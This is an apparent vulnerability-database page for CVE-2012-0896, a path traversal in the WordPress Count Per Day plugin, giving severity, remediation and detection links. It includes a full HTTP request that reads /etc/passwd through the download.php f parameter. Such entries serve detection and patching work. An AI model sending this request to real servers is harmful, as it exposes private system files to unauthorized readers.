🔙 목록으로 돌아가기

CVE-2012-0896: Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access

TitleCount Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access
Authordaffainfo
SeverityMedium
ImpactAn attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further compromise of the system.
RemediationUpgrade to a patched version of the Count Per Day plugin (version 3.2 or above) or apply the vendor-supplied patch to fix the path traversal vulnerability.
CVSS Score5
EPSS Score0.03691
CVE IDCVE-2012-0896
CWE IDCWE-22
Tags cve cve2012 packetstorm lfi wordpress wp-plugin traversal count_per_day_project vuln

🔍 Vulnerability Description

An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter.

🌐 HTTP Request

GET /wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2012/CVE-2012-0896.yaml

🦈 Packet Capture: ⬇️ Download cve-2012-0896.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A